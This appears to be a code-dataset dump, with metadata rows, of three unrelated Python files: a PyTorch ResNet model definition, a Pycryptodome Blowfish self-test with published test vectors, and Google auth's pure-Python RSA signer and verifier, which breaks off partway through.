def __init__(self, inplanes, planes, stride=1, expansion=4, downsample=None, groups=1, residual_block=None, dropout=0.):
super(Bottleneck, self).__init__()
dropout = 0 if dropout is None else dropout
self.conv1 = nn.Conv2d(
inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=stride, groups=groups)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, planes * expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * expansion)
self.relu = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout)
self.downsample = downsample
self.residual_block = residual_block
self.stride = stride
self.expansion = expansion
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.dropout(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(residual)
if self.residual_block is not None:
residual = self.residual_block(residual)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self):
super(ResNet, self).__init__()
def _make_layer(self, block, planes, blocks, expansion=1, stride=1, groups=1, residual_block=None, dropout=None, mixup=False):
downsample = None
out_planes = planes * expansion
if stride != 1 or self.inplanes != out_planes:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, out_planes,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * expansion),
)
if residual_block is not None:
residual_block = residual_block(out_planes)
layers = []
layers.append(block(self.inplanes, planes, stride, expansion=expansion,
downsample=downsample, groups=groups, residual_block=residual_block, dropout=dropout))
self.inplanes = planes * expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, expansion=expansion, groups=groups,
residual_block=residual_block, dropout=dropout))
if mixup:
layers.append(MixUp())
return nn.Sequential(*layers)
def features(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
return x.view(x.size(0), -1)
def forward(self, x):
x = self.features(x)
x = self.fc(x)
return x
class ResNet_imagenet(ResNet):
num_train_images = 1281167
def __init__(self, num_classes=1000, inplanes=64,
block=Bottleneck, residual_block=None, layers=[3, 4, 23, 3],
width=[64, 128, 256, 512], expansion=4, groups=[1, 1, 1, 1],
regime='normal', scale_lr=1, ramp_up_lr=True, checkpoint_segments=0, mixup=False,
base_devices=4, base_device_batch=64, base_duplicates=1, base_image_size=224, mix_size_regime='D+'):
super(ResNet_imagenet, self).__init__()
self.inplanes = inplanes
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
for i in range(len(layers)):
layer = self._make_layer(block=block, planes=width[i], blocks=layers[i], expansion=expansion,
stride=1 if i == 0 else 2, residual_block=residual_block, groups=groups[i],
mixup=mixup)
if checkpoint_segments > 0:
layer_checkpoint_segments = min(checkpoint_segments, layers[i])
layer = CheckpointModule(layer, layer_checkpoint_segments)
setattr(self, 'layer%s' % str(i + 1), layer)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1] * expansion, num_classes)
init_model(self)
batch_size = base_devices * base_device_batch
num_steps_epoch = math.floor(self.num_train_images / batch_size)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 30, 'lr': scale_lr * 1e-2},
{'epoch': 60, 'lr': scale_lr * 1e-3},
{'epoch': 80, 'lr': scale_lr * 1e-4}
]
if 'cutmix' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': scale_lr * 1e-1,
'momentum': 0.9, 'regularizer': weight_decay_config(1e-4)},
{'epoch': 75, 'lr': scale_lr * 1e-2},
{'epoch': 150, 'lr': scale_lr * 1e-3},
{'epoch': 225, 'lr': scale_lr * 1e-4}
]
if 'sampled' in regime:
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
ramp_up_lr = False
self.data_regime = None
def size_config(size): return mixsize_config(size, base_size=base_image_size, base_batch=base_device_batch, base_duplicates=base_duplicates,
adapt_batch=mix_size_regime == 'B+', adapt_duplicates=mix_size_regime == 'D+')
increment = int(base_image_size / 7)
if '144' in regime:
self.sampled_data_regime = [
(0.1, size_config(base_image_size+increment)),
(0.1, size_config(base_image_size)),
(0.6, size_config(base_image_size - 3*increment)),
(0.2, size_config(base_image_size - 4*increment)),
]
else: self.sampled_data_regime = [
(0.8/6, size_config(base_image_size - 3*increment)),
(0.8/6, size_config(base_image_size - 2*increment)),
(0.8/6, size_config(base_image_size - increment)),
(0.2, size_config(base_image_size)),
(0.8/6, size_config(base_image_size + increment)),
(0.8/6, size_config(base_image_size + 2*increment)),
(0.8/6, size_config(base_image_size + 3*increment)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': base_image_size}
]
if ramp_up_lr and scale_lr > 1: self.regime[0]['step_lambda'] = ramp_up_fn(0.1, 0.1 * scale_lr,
num_steps_epoch * 5)
self.regime.insert(1, {'epoch': 5, 'lr': scale_lr * 1e-1})
class ResNet_cifar(ResNet):
def __init__(self, num_classes=10, inplanes=16,
block=BasicBlock, depth=18, width=[16, 32, 64],
groups=[1, 1, 1], residual_block=None, regime='normal', dropout=None, mixup=False):
super(ResNet_cifar, self).__init__()
self.inplanes = inplanes
n = int((depth - 2) / 6)
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = lambda x: x
self.layer1 = self._make_layer(block, width[0], n, groups=groups[0],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer2 = self._make_layer(block, width[1], n, stride=2, groups=groups[1],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer3 = self._make_layer(block, width[2], n, stride=2, groups=groups[2],
residual_block=residual_block, dropout=dropout, mixup=mixup)
self.layer4 = lambda x: x
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(width[-1], num_classes)
init_model(self)
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(1e-4)},
{'epoch': 81, 'lr': 1e-2},
{'epoch': 122, 'lr': 1e-3},
{'epoch': 164, 'lr': 1e-4}
]
if 'wide-resnet' in regime:
self.regime = [
{'epoch': 0, 'optimizer': 'SGD', 'lr': 1e-1, 'momentum': 0.9,
'regularizer': weight_decay_config(5e-4)},
{'epoch': 60, 'lr': 2e-2},
{'epoch': 120, 'lr': 4e-3},
{'epoch': 160, 'lr': 8e-4}
]
if 'sampled' in regime:
adapt_batch = True if 'B+' in regime else False
adapt_duplicates = True if ('D+' in regime or not adapt_batch) \
else False
def size_config(size): return mixsize_config(size, base_size=32, base_batch=64, base_duplicates=1,
adapt_batch=adapt_batch, adapt_duplicates=adapt_duplicates)
self.regime[0]['regularizer'] = [{'name': 'GradSmooth', 'momentum': 0.9, 'log': False},
weight_decay_config(1e-4)]
self.data_regime = None
self.sampled_data_regime = [
(0.3, size_config(32)),
(0.2, size_config(48)),
(0.3, size_config(24)),
(0.2, size_config(16)),
]
self.data_eval_regime = [
{'epoch': 0, 'input_size': 32, 'scale_size': 32}
]
def resnet(**config):
dataset = config.pop('dataset', 'imagenet')
if config.pop('quantize', False):
from .modules.quantize import QConv2d, QLinear, RangeBN
torch.nn.Linear = QLinear
torch.nn.Conv2d = QConv2d
torch.nn.BatchNorm2d = RangeBN
bn_norm = config.pop('bn_norm', None)
if bn_norm is not None:
from .modules.lp_norm import L1BatchNorm2d, TopkBatchNorm2d
if bn_norm == 'L1':
torch.nn.BatchNorm2d = L1BatchNorm2d
if bn_norm == 'TopK':
torch.nn.BatchNorm2d = TopkBatchNorm2d
if 'imagenet' in dataset:
config.setdefault('num_classes', 1000)
depth = config.pop('depth', 50)
if depth == 18:
config.update(dict(block=BasicBlock,
layers=[2, 2, 2, 2],
expansion=1))
if depth == 34:
config.update(dict(block=BasicBlock,
layers=[3, 4, 6, 3],
expansion=1))
if depth == 50:
config.update(dict(block=Bottleneck, layers=[3, 4, 6, 3]))
if depth == 101:
config.update(dict(block=Bottleneck, layers=[3, 4, 23, 3]))
if depth == 152:
config.update(dict(block=Bottleneck, layers=[3, 8, 36, 3]))
if depth == 200:
config.update(dict(block=Bottleneck, layers=[3, 24, 36, 3]))
return ResNet_imagenet(**config)
elif dataset == 'cifar10':
config.setdefault('num_classes', 10)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
elif dataset == 'cifar100':
config.setdefault('num_classes', 100)
config.setdefault('depth', 44)
return ResNet_cifar(block=BasicBlock, **config)
def resnet_se(**config):
config['residual_block'] = SEBlock
return resnet(**config)
| true | true |
1c4a9d5d339e6b97fd46492825604da475aeac37 | 6,136 | py | Python | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 2,557 | 2016-07-19T22:20:45.000Z | 2022-01-25T10:53:35.000Z | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 1,360 | 2016-07-20T02:06:42.000Z | 2021-07-27T12:46:40.000Z | lib/lib/Cryptodome/SelfTest/Cipher/test_Blowfish.py | Zhangxi-Lam/alfred-google-keep | 9f8f891e103f33a7e749907fe5cbfcf779131c8e | [
"MIT"
] | 607 | 2016-07-20T03:34:04.000Z | 2022-01-05T14:57:09.000Z | # -*- coding: utf-8 -*-
#
# SelfTest/Cipher/test_Blowfish.py: Self-test for the Blowfish cipher
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Cryptodome.Cipher.Blowfish"""
import unittest
from Cryptodome.Util.py3compat import bchr
from Cryptodome.Cipher import Blowfish
# This is a list of (plaintext, ciphertext, key) tuples.
test_data = [
# Test vectors from http://www.schneier.com/code/vectors.txt
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('ffffffffffffffff', '51866fd5b85ecb8a', 'ffffffffffffffff'),
('1000000000000001', '7d856f9a613063f2', '3000000000000000'),
('1111111111111111', '2466dd878b963c9d', '1111111111111111'),
('1111111111111111', '61f9c3802281b096', '0123456789abcdef'),
('0123456789abcdef', '7d0cc630afda1ec7', '1111111111111111'),
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('0123456789abcdef', '0aceab0fc6a0a28d', 'fedcba9876543210'),
('01a1d6d039776742', '59c68245eb05282b', '7ca110454a1a6e57'),
('5cd54ca83def57da', 'b1b8cc0b250f09a0', '0131d9619dc1376e'),
('0248d43806f67172', '1730e5778bea1da4', '07a1133e4a0b2686'),
('51454b582ddf440a', 'a25e7856cf2651eb', '3849674c2602319e'),
('42fd443059577fa2', '353882b109ce8f1a', '04b915ba43feb5b6'),
('059b5e0851cf143a', '48f4d0884c379918', '0113b970fd34f2ce'),
('0756d8e0774761d2', '432193b78951fc98', '0170f175468fb5e6'),
('762514b829bf486a', '13f04154d69d1ae5', '43297fad38e373fe'),
('3bdd119049372802', '2eedda93ffd39c79', '07a7137045da2a16'),
('26955f6835af609a', 'd887e0393c2da6e3', '04689104c2fd3b2f'),
('164d5e404f275232', '5f99d04f5b163969', '37d06bb516cb7546'),
('6b056e18759f5cca', '4a057a3b24d3977b', '1f08260d1ac2465e'),
('004bd6ef09176062', '452031c1e4fada8e', '584023641aba6176'),
('480d39006ee762f2', '7555ae39f59b87bd', '025816164629b007'),
('437540c8698f3cfa', '53c55f9cb49fc019', '49793ebc79b3258f'),
('072d43a077075292', '7a8e7bfa937e89a3', '4fb05e1515ab73a7'),
('02fe55778117f12a', 'cf9c5d7a4986adb5', '49e95d6d4ca229bf'),
('1d9d5c5018f728c2', 'd1abb290658bc778', '018310dc409b26d6'),
('305532286d6f295a', '55cb3774d13ef201', '1c587f1c13924fef'),
('0123456789abcdef', 'fa34ec4847b268b2', '0101010101010101'),
('0123456789abcdef', 'a790795108ea3cae', '1f1f1f1f0e0e0e0e'),
('0123456789abcdef', 'c39e072d9fac631d', 'e0fee0fef1fef1fe'),
('ffffffffffffffff', '014933e0cdaff6e4', '0000000000000000'),
('0000000000000000', 'f21e9a77b71c49bc', 'ffffffffffffffff'),
('0000000000000000', '245946885754369a', '0123456789abcdef'),
('ffffffffffffffff', '6b5c5a9c5d9e0a5a', 'fedcba9876543210'),
#('fedcba9876543210', 'f9ad597c49db005e', 'f0'),
#('fedcba9876543210', 'e91d21c1d961a6d6', 'f0e1'),
#('fedcba9876543210', 'e9c2b70a1bc65cf3', 'f0e1d2'),
#('fedcba9876543210', 'be1e639408640f05', 'f0e1d2c3'),
('fedcba9876543210', 'b39e44481bdb1e6e', 'f0e1d2c3b4'),
('fedcba9876543210', '9457aa83b1928c0d', 'f0e1d2c3b4a5'),
('fedcba9876543210', '8bb77032f960629d', 'f0e1d2c3b4a596'),
('fedcba9876543210', 'e87a244e2cc85e82', 'f0e1d2c3b4a59687'),
('fedcba9876543210', '15750e7a4f4ec577', 'f0e1d2c3b4a5968778'),
('fedcba9876543210', '122ba70b3ab64ae0', 'f0e1d2c3b4a596877869'),
('fedcba9876543210', '3a833c9affc537f6', 'f0e1d2c3b4a5968778695a'),
('fedcba9876543210', '9409da87a90f6bf2', 'f0e1d2c3b4a5968778695a4b'),
('fedcba9876543210', '884f80625060b8b4', 'f0e1d2c3b4a5968778695a4b3c'),
('fedcba9876543210', '1f85031c19e11968', 'f0e1d2c3b4a5968778695a4b3c2d'),
('fedcba9876543210', '79d9373a714ca34f', 'f0e1d2c3b4a5968778695a4b3c2d1e'),
('fedcba9876543210', '93142887ee3be15c',
'f0e1d2c3b4a5968778695a4b3c2d1e0f'),
('fedcba9876543210', '03429e838ce2d14b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00'),
('fedcba9876543210', 'a4299e27469ff67b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011'),
('fedcba9876543210', 'afd5aed1c1bc96a8',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122'),
('fedcba9876543210', '10851c0e3858da9f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233'),
('fedcba9876543210', 'e6f51ed79b9db21f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344'),
('fedcba9876543210', '64a6e14afd36b46f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122334455'),
('fedcba9876543210', '80c7d7d45a5479ad',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233445566'),
('fedcba9876543210', '05044b62fa52d080',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344556677'),
]
class KeyLength(unittest.TestCase):
def runTest(self):
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 4,
Blowfish.MODE_ECB)
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 57,
Blowfish.MODE_ECB)
def get_tests(config={}):
from common import make_block_tests
tests = make_block_tests(Blowfish, "Blowfish", test_data)
tests.append(KeyLength())
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| 49.088 | 79 | 0.71105 |
import unittest
from Cryptodome.Util.py3compat import bchr
from Cryptodome.Cipher import Blowfish
test_data = [
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('ffffffffffffffff', '51866fd5b85ecb8a', 'ffffffffffffffff'),
('1000000000000001', '7d856f9a613063f2', '3000000000000000'),
('1111111111111111', '2466dd878b963c9d', '1111111111111111'),
('1111111111111111', '61f9c3802281b096', '0123456789abcdef'),
('0123456789abcdef', '7d0cc630afda1ec7', '1111111111111111'),
('0000000000000000', '4ef997456198dd78', '0000000000000000'),
('0123456789abcdef', '0aceab0fc6a0a28d', 'fedcba9876543210'),
('01a1d6d039776742', '59c68245eb05282b', '7ca110454a1a6e57'),
('5cd54ca83def57da', 'b1b8cc0b250f09a0', '0131d9619dc1376e'),
('0248d43806f67172', '1730e5778bea1da4', '07a1133e4a0b2686'),
('51454b582ddf440a', 'a25e7856cf2651eb', '3849674c2602319e'),
('42fd443059577fa2', '353882b109ce8f1a', '04b915ba43feb5b6'),
('059b5e0851cf143a', '48f4d0884c379918', '0113b970fd34f2ce'),
('0756d8e0774761d2', '432193b78951fc98', '0170f175468fb5e6'),
('762514b829bf486a', '13f04154d69d1ae5', '43297fad38e373fe'),
('3bdd119049372802', '2eedda93ffd39c79', '07a7137045da2a16'),
('26955f6835af609a', 'd887e0393c2da6e3', '04689104c2fd3b2f'),
('164d5e404f275232', '5f99d04f5b163969', '37d06bb516cb7546'),
('6b056e18759f5cca', '4a057a3b24d3977b', '1f08260d1ac2465e'),
('004bd6ef09176062', '452031c1e4fada8e', '584023641aba6176'),
('480d39006ee762f2', '7555ae39f59b87bd', '025816164629b007'),
('437540c8698f3cfa', '53c55f9cb49fc019', '49793ebc79b3258f'),
('072d43a077075292', '7a8e7bfa937e89a3', '4fb05e1515ab73a7'),
('02fe55778117f12a', 'cf9c5d7a4986adb5', '49e95d6d4ca229bf'),
('1d9d5c5018f728c2', 'd1abb290658bc778', '018310dc409b26d6'),
('305532286d6f295a', '55cb3774d13ef201', '1c587f1c13924fef'),
('0123456789abcdef', 'fa34ec4847b268b2', '0101010101010101'),
('0123456789abcdef', 'a790795108ea3cae', '1f1f1f1f0e0e0e0e'),
('0123456789abcdef', 'c39e072d9fac631d', 'e0fee0fef1fef1fe'),
('ffffffffffffffff', '014933e0cdaff6e4', '0000000000000000'),
('0000000000000000', 'f21e9a77b71c49bc', 'ffffffffffffffff'),
('0000000000000000', '245946885754369a', '0123456789abcdef'),
('ffffffffffffffff', '6b5c5a9c5d9e0a5a', 'fedcba9876543210'),
('fedcba9876543210', 'b39e44481bdb1e6e', 'f0e1d2c3b4'),
('fedcba9876543210', '9457aa83b1928c0d', 'f0e1d2c3b4a5'),
('fedcba9876543210', '8bb77032f960629d', 'f0e1d2c3b4a596'),
('fedcba9876543210', 'e87a244e2cc85e82', 'f0e1d2c3b4a59687'),
('fedcba9876543210', '15750e7a4f4ec577', 'f0e1d2c3b4a5968778'),
('fedcba9876543210', '122ba70b3ab64ae0', 'f0e1d2c3b4a596877869'),
('fedcba9876543210', '3a833c9affc537f6', 'f0e1d2c3b4a5968778695a'),
('fedcba9876543210', '9409da87a90f6bf2', 'f0e1d2c3b4a5968778695a4b'),
('fedcba9876543210', '884f80625060b8b4', 'f0e1d2c3b4a5968778695a4b3c'),
('fedcba9876543210', '1f85031c19e11968', 'f0e1d2c3b4a5968778695a4b3c2d'),
('fedcba9876543210', '79d9373a714ca34f', 'f0e1d2c3b4a5968778695a4b3c2d1e'),
('fedcba9876543210', '93142887ee3be15c',
'f0e1d2c3b4a5968778695a4b3c2d1e0f'),
('fedcba9876543210', '03429e838ce2d14b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00'),
('fedcba9876543210', 'a4299e27469ff67b',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011'),
('fedcba9876543210', 'afd5aed1c1bc96a8',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122'),
('fedcba9876543210', '10851c0e3858da9f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233'),
('fedcba9876543210', 'e6f51ed79b9db21f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344'),
('fedcba9876543210', '64a6e14afd36b46f',
'f0e1d2c3b4a5968778695a4b3c2d1e0f001122334455'),
('fedcba9876543210', '80c7d7d45a5479ad',
'f0e1d2c3b4a5968778695a4b3c2d1e0f00112233445566'),
('fedcba9876543210', '05044b62fa52d080',
'f0e1d2c3b4a5968778695a4b3c2d1e0f0011223344556677'),
]
class KeyLength(unittest.TestCase):
def runTest(self):
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 4,
Blowfish.MODE_ECB)
self.assertRaises(ValueError, Blowfish.new, bchr(0) * 57,
Blowfish.MODE_ECB)
def get_tests(config={}):
from common import make_block_tests
tests = make_block_tests(Blowfish, "Blowfish", test_data)
tests.append(KeyLength())
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
| true | true |
1c4a9dab8a4dee81d5f84fa57fcef0380cf1a15a | 5,951 | py | Python | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | 4 | 2021-10-20T12:39:09.000Z | 2022-02-26T15:02:08.000Z | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | null | null | null | google/auth/crypt/_python_rsa.py | renovate-bot/google-auth-library-python | a4cf9b1bf461a3fb35432e42f4d8bc1a8ff7bc97 | [
"Apache-2.0"
] | 1 | 2021-10-20T13:47:10.000Z | 2021-10-20T13:47:10.000Z | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pure-Python RSA cryptography implementation.
Uses the ``rsa``, ``pyasn1`` and ``pyasn1_modules`` packages
to parse PEM files storing PKCS#1 or PKCS#8 keys as well as
certificates. There is no support for p12 files.
"""
from __future__ import absolute_import
import io
from pyasn1.codec.der import decoder
from pyasn1_modules import pem
from pyasn1_modules.rfc2459 import Certificate
from pyasn1_modules.rfc5208 import PrivateKeyInfo
import rsa
from google.auth import _helpers
from google.auth.crypt import base
_POW2 = (128, 64, 32, 16, 8, 4, 2, 1)
_CERTIFICATE_MARKER = b"-----BEGIN CERTIFICATE-----"
_PKCS1_MARKER = ("-----BEGIN RSA PRIVATE KEY-----", "-----END RSA PRIVATE KEY-----")
_PKCS8_MARKER = ("-----BEGIN PRIVATE KEY-----", "-----END PRIVATE KEY-----")
_PKCS8_SPEC = PrivateKeyInfo()
def _bit_list_to_bytes(bit_list):
"""Converts an iterable of 1s and 0s to bytes.
Combines the list 8 at a time, treating each group of 8 bits
as a single byte.
Args:
bit_list (Sequence): Sequence of 1s and 0s.
Returns:
bytes: The decoded bytes.
"""
num_bits = len(bit_list)
byte_vals = bytearray()
for start in range(0, num_bits, 8):
curr_bits = bit_list[start : start + 8]
char_val = sum(val * digit for val, digit in zip(_POW2, curr_bits))
byte_vals.append(char_val)
return bytes(byte_vals)
class RSAVerifier(base.Verifier):
"""Verifies RSA cryptographic signatures using public keys.
Args:
public_key (rsa.key.PublicKey): The public key used to verify
signatures.
"""
def __init__(self, public_key):
self._pubkey = public_key
@_helpers.copy_docstring(base.Verifier)
def verify(self, message, signature):
message = _helpers.to_bytes(message)
try:
return rsa.pkcs1.verify(message, signature, self._pubkey)
except (ValueError, rsa.pkcs1.VerificationError):
return False
@classmethod
def from_string(cls, public_key):
"""Construct an Verifier instance from a public key or public
certificate string.
Args:
public_key (Union[str, bytes]): The public key in PEM format or the
x509 public key certificate.
Returns:
google.auth.crypt._python_rsa.RSAVerifier: The constructed verifier.
Raises:
ValueError: If the public_key can't be parsed.
"""
public_key = _helpers.to_bytes(public_key)
is_x509_cert = _CERTIFICATE_MARKER in public_key
# If this is a certificate, extract the public key info.
if is_x509_cert:
der = rsa.pem.load_pem(public_key, "CERTIFICATE")
asn1_cert, remaining = decoder.decode(der, asn1Spec=Certificate())
if remaining != b"":
raise ValueError("Unused bytes", remaining)
cert_info = asn1_cert["tbsCertificate"]["subjectPublicKeyInfo"]
key_bytes = _bit_list_to_bytes(cert_info["subjectPublicKey"])
pubkey = rsa.PublicKey.load_pkcs1(key_bytes, "DER")
else:
pubkey = rsa.PublicKey.load_pkcs1(public_key, "PEM")
return cls(pubkey)
class RSASigner(base.Signer, base.FromServiceAccountMixin):
"""Signs messages with an RSA private key.
Args:
private_key (rsa.key.PrivateKey): The private key to sign with.
key_id (str): Optional key ID used to identify this private key. This
can be useful to associate the private key with its associated
public key or certificate.
"""
def __init__(self, private_key, key_id=None):
self._key = private_key
self._key_id = key_id
@property
@_helpers.copy_docstring(base.Signer)
def key_id(self):
return self._key_id
@_helpers.copy_docstring(base.Signer)
def sign(self, message):
message = _helpers.to_bytes(message)
return rsa.pkcs1.sign(message, self._key, "SHA-256")
@classmethod
def from_string(cls, key, key_id=None):
"""Construct an Signer instance from a private key in PEM format.
Args:
key (str): Private key in PEM format.
key_id (str): An optional key id used to identify the private key.
Returns:
google.auth.crypt.Signer: The constructed signer.
Raises:
ValueError: If the key cannot be parsed as PKCS#1 or PKCS#8 in
PEM format.
"""
key = _helpers.from_bytes(key) # PEM expects str in Python 3
marker_id, key_bytes = pem.readPemBlocksFromFile(
io.StringIO(key), _PKCS1_MARKER, _PKCS8_MARKER
)
# Key is in pkcs1 format.
if marker_id == 0:
private_key = rsa.key.PrivateKey.load_pkcs1(key_bytes, format="DER")
# Key is in pkcs8.
elif marker_id == 1:
key_info, remaining = decoder.decode(key_bytes, asn1Spec=_PKCS8_SPEC)
if remaining != b"":
raise ValueError("Unused bytes", remaining)
private_key_info = key_info.getComponentByName("privateKey")
private_key = rsa.key.PrivateKey.load_pkcs1(
private_key_info.asOctets(), format="DER"
)
else:
raise ValueError("No key could be detected.")
return cls(private_key, key_id=key_id)
| 34.005714 | 84 | 0.65384 |
from __future__ import absolute_import
import io
from pyasn1.codec.der import decoder
from pyasn1_modules import pem
from pyasn1_modules.rfc2459 import Certificate
from pyasn1_modules.rfc5208 import PrivateKeyInfo
import rsa
from google.auth import _helpers
from google.auth.crypt import base
_POW2 = (128, 64, 32, 16, 8, 4, 2, 1)
_CERTIFICATE_MARKER = b"-----BEGIN CERTIFICATE-----"
_PKCS1_MARKER = ("-----BEGIN RSA PRIVATE KEY-----", "-----END RSA PRIVATE KEY-----")
_PKCS8_MARKER = ("-----BEGIN PRIVATE KEY-----", "-----END PRIVATE KEY-----")
_PKCS8_SPEC = PrivateKeyInfo()
def _bit_list_to_bytes(bit_list):
num_bits = len(bit_list)
byte_vals = bytearray()
for start in range(0, num_bits, 8):
curr_bits = bit_list[start : start + 8]
char_val = sum(val * digit for val, digit in zip(_POW2, curr_bits))
byte_vals.append(char_val)
return bytes(byte_vals)
class RSAVerifier(base.Verifier):
def __init__(self, public_key):
self._pubkey = public_key
@_helpers.copy_docstring(base.Verifier)
def verify(self, message, signature):
message = _helpers.to_bytes(message)
try:
return rsa.pkcs1.verify(message, signature, self._pubkey)
except (ValueError, rsa.pkcs1.VerificationError):
return False
@classmethod
def from_string(cls, public_key):
public_key = _helpers.to_bytes(public_key)
is_x509_cert = _CERTIFICATE_MARKER in public_key
if is_x509_cert:
der = rsa.pem.load_pem(public_key, "CERTIFICATE")
asn1_cert, remaining = decoder.decode(der, asn1Spec=Certificate())
if remaining != b"":
raise ValueError("Unused bytes", remaining)
cert_info = asn1_cert["tbsCertificate"]["subjectPublicKeyInfo"]
key_bytes = _bit_list_to_bytes(cert_info["subjectPublicKey"])
pubkey = rsa.PublicKey.load_pkcs1(key_bytes, "DER")
else:
pubkey = rsa.PublicKey.load_pkcs1(public_key, "PEM")
return cls(pubkey)
class RSASigner(base.Signer, base.FromServiceAccountMixin):
def __init__(self, private_key, key_id=None):
self._key = private_key
self._key_id = key_id
@property
@_helpers.copy_docstring(base.Signer)
def key_id(self):
return self._key_id
@_helpers.copy_docstring(base.Signer)
def sign(self, message):
message = _helpers.to_bytes(message)
return rsa.pkcs1.sign(message, self._key, "SHA-256")
@classmethod
def from_string(cls, key, key_id=None):
key = _helpers.from_bytes(key) marker_id, key_bytes = pem.readPemBlocksFromFile(
io.StringIO(key), _PKCS1_MARKER, _PKCS8_MARKER
)
if marker_id == 0:
private_key = rsa.key.PrivateKey.load_pkcs1(key_bytes, format="DER")
elif marker_id == 1:
key_info, remaining = decoder.decode(key_bytes, asn1Spec=_PKCS8_SPEC)
if remaining != b"":
raise ValueError("Unused bytes", remaining)
private_key_info = key_info.getComponentByName("privateKey")
private_key = rsa.key.PrivateKey.load_pkcs1(
private_key_info.asOctets(), format="DER"
)
else:
